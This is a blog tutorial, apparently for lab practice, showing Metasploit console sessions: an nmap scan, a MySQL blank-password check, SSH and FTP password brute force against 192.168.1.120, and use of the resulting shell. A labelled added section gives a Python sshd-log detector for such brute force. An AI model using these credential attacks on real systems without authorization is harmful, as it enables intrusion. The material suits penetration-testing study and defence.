1.1 Metasploit attack examples
1.1.1 Attacking a MySQL service with a blank password
1.1.1.1 Scan the host and import the results into Metasploit
# nmap -A -T4 -v 192.168.1.120 -oX /tmp/192.168.1.120.xml
msf6 > db_import /tmp/192.168.1.120.xml
msf6 > hosts -R 192.168.1.120
msf6 > services -R 192.168.1.120
1.1.1.2 Verify whether the host has the MySQL blank-password vulnerability
msf6 > search mysql type:auxiliary
msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > show options
msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/mysql/mysql_login) > run
1.1.1.3 List all credentials stored in the database
msf6 auxiliary(scanner/mysql/mysql_login) > creds
1.1.1.4 Export the scan results for use by another Metasploit instance
msf6 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /tmp/192.168.1.120-mysql.xml
[*] Starting export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]...
[*] Finished export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]...
1.1.2 Brute-forcing SSH
1.1.2.1 Run the brute-force attack against SSH
msf6 > search ssh_login
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > show options
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ssh/ssh_login) > exploit
1.1.2.2 Verify the result after cracking
msf6 auxiliary(scanner/ssh/ssh_login) > sessions
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 8
[*] Starting interaction with 8...
whoami
msfadmin
ls
vulnerable
background
Background session 9? [y/N] y
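On the target side, a run like the ssh_login one above shows up in the sshd auth log as a streak of failed password logins from one address, ending in an accepted login when STOP_ON_SUCCESS is set. The following detection sketch is an added example, not part of the original post; the log lines are constructed, and the scanner address 192.168.1.50, the host name "target", the user "ops" and the threshold of 5 are assumptions.

```python
import re
from collections import defaultdict

# OpenSSH password-auth messages; "invalid user" appears for unknown accounts.
EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Constructed sample lines (not from the original post); 192.168.1.50 is an assumed scanner.
SAMPLE_LOG = """\
Dec 20 20:40:01 target sshd[2101]: Failed password for root from 192.168.1.50 port 40100 ssh2
Dec 20 20:40:02 target sshd[2103]: Failed password for root from 192.168.1.50 port 40102 ssh2
Dec 20 20:40:03 target sshd[2105]: Failed password for invalid user admin from 192.168.1.50 port 40104 ssh2
Dec 20 20:40:03 target sshd[2090]: Failed password for ops from 192.168.1.10 port 51000 ssh2
Dec 20 20:40:04 target sshd[2107]: Failed password for invalid user test from 192.168.1.50 port 40106 ssh2
Dec 20 20:40:05 target sshd[2109]: Failed password for msfadmin from 192.168.1.50 port 40108 ssh2
Dec 20 20:40:06 target sshd[2090]: Accepted password for ops from 192.168.1.10 port 51000 ssh2
Dec 20 20:40:06 target sshd[2111]: Failed password for postgres from 192.168.1.50 port 40110 ssh2
Dec 20 20:40:07 target sshd[2113]: Accepted password for msfadmin from 192.168.1.50 port 40112 ssh2
""".splitlines()


def find_bruteforce(lines, threshold=5):
    """Alert on source IPs with >= threshold consecutive failed password logins.

    "guessing" fires once when the streak reaches the threshold;
    "compromise" fires when an accepted login ends such a streak.
    """
    streak = defaultdict(int)  # source IP -> consecutive failures so far
    alerts = []
    for line in lines:
        m = EVENT.search(line)
        if m is None:
            continue  # not a password-auth event
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            streak[ip] += 1
            if streak[ip] == threshold:
                alerts.append({"kind": "guessing", "ip": ip, "user": None,
                               "failures": streak[ip]})
        else:
            if streak[ip] >= threshold:
                alerts.append({"kind": "compromise", "ip": ip, "user": user,
                               "failures": streak[ip]})
            streak[ip] = 0  # a success resets the streak (one typo is not an attack)
    return alerts


if __name__ == "__main__":
    for alert in find_bruteforce(SAMPLE_LOG):
        print(alert)
```

A "compromise" alert names the account whose password was guessed, which is the one to disable and rotate first.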
1.1.3 Brute-forcing FTP
1.1.3.1 Run the brute-force attack against FTP
msf6 > search ftp_login
msf6 > use 0
msf6 auxiliary(scanner/ftp/ftp_login) > show options
msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ftp/ftp_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ftp/ftp_login) > exploit
Note: this article was last updated on 2022-12-20 20:57:32. When reposting, please cite the link to this article: https://blog.leonshadow.cn/763482/2965.html